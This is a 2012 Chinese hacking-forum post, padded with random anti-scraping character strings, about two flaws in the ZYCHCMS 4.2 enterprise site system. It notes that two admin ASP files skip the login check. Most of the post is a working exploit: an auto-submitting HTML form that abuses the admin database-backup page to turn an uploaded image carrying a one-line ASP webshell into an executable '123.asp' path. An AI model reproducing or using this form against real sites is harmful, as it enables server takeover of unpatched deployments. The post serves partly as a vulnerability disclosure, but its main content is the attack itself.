中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
5 P a5 [- ?' [6 l- M) [. C
5 n3 W# [9 x' ] p
% w8 V% ^ a( U* C, ~
w0 \/ Q7 p) p; T
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
: |* s1 @' \, [7 w2 n* W
①SQL注射漏洞
: r |6 _* u A9 \% H) X, r- `
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
( s% }( ^0 i! j
漏洞原因:未过滤
5 g& w$ W4 C8 f
漏洞代码:
0 c: V3 M/ t+ m4 N/ P! o
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
$ @ w( B1 d0 r C8 C8 ]
修复方法:在文件开头加入代码
2 ?3 f5 d0 d" r# q7 i9 @
; N( C( U/ y" v, u9 @. ]4 ^+ N
0 z7 h# ?% m* _
②后台拿WBSHELL
1 _- z2 j* u- I$ ?( ]
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
+ h) j7 [- M7 t; I
这里在网上找了一个,改了下,将就着用。
( j) }% e. |& `3 O" v
以下是代码本地提交代码
. G1 M+ A M( y3 c
2 R1 c# |4 Q4 C% A, Y8 d n
* X& M7 F: f! u
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
" L: {% `1 `/ t9 `( H' E
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
7 Q8 ~5 w6 D* f2 }
<tr>
, ]4 o7 c- E. j' d( e
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
5 s) _" S5 u* x! ]6 h4 p8 y
</tr>
5 d) v* {, ~) y9 ]$ t
<tr>
; K/ t3 ?1 o1 p$ D4 {) k0 A
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
* o% J# N( t6 w& [
</span>
" ~1 [2 N: z5 L
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
3 Y0 c; D! r' K h
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
5 ?5 I4 K ?2 u6 Q, Z
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
) h7 X5 e6 {" q0 h8 T! {: `; [
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
- q4 Z0 |% V% ?# y
<div align=”left”>
1 b& }4 N0 R Z
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
4 F) F8 G% K$ e9 _
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
( n% o5 N4 X2 |: u
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
! o0 j! W2 U5 w: n
</div></td>
A& k. T6 { C8 Z' v2 ` c
</tr>
7 A1 S ^& }* R3 K% c6 `
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
W( A' e' l' n# ]6 t
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
0 x8 M0 N5 c5 n" G* g, O3 o
<td class=”td”><div align=”left”>
; N ^6 [) w+ |/ h
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
. C! I5 D. B, P* ^+ Y+ {; d
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
3 y, F! @. F4 h) {
</tr>
5 E; u9 U, M2 O! D1 B! p5 A
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
2 t) P8 u. V' r' v' G* c$ z
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
& c1 @ [/ o1 R' _1 ]) ^5 |: S
<td class=”td”><div align=”left”>
9 d" S( M% M% s1 }
<input type=”submit” value=”确定备份” class=”btn”
( H2 n9 q% _: F1 s+ g$ H
</div></td>
" u# C0 L; D0 x4 Y# x' w6 k. ~: M
</tr>
, K0 F7 \3 ]/ R2 q2 t3 I ~
</table></td></tr></form>
m y& R' J& p a& ~# D- R; k" Y. V
</table>
$ Z$ I! x- c* I1 v+ _) Q9 l) x
</td>
3 M$ Z# X& K3 e/ n
</tr>
: t$ v t) F4 V8 S0 D% L
</table>
1 J5 s+ Y4 n6 g8 Q1 [3 w( R
<script>
9 c" J( `4 x% b+ F+ T; S0 ?: H
document.all.add.submit();
f/ e$ N# f# d0 B# ^
</script>
U/ i Z9 _' v9 O9 T7 w
* ~; K' F" x R* D6 S7 o/ G$ [7 S* v
! V6 N$ N0 x* w4 b) p3 M& w7 R% A
; K( X+ q" s1 S) m
) P- V, L9 A7 c" Y
3 j4 r% r: Y0 D9 ]: m' S, ]
9 \1 }0 G5 o/ a4 Z
. Z& p& |% L1 D4 t
4 Z4 s/ q1 x+ `4 z& Q& P
1 ^. \ `6 X+ {7 k6 L9 q
& F, P" Z# ?0 q% Q+ l& B0 ~
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2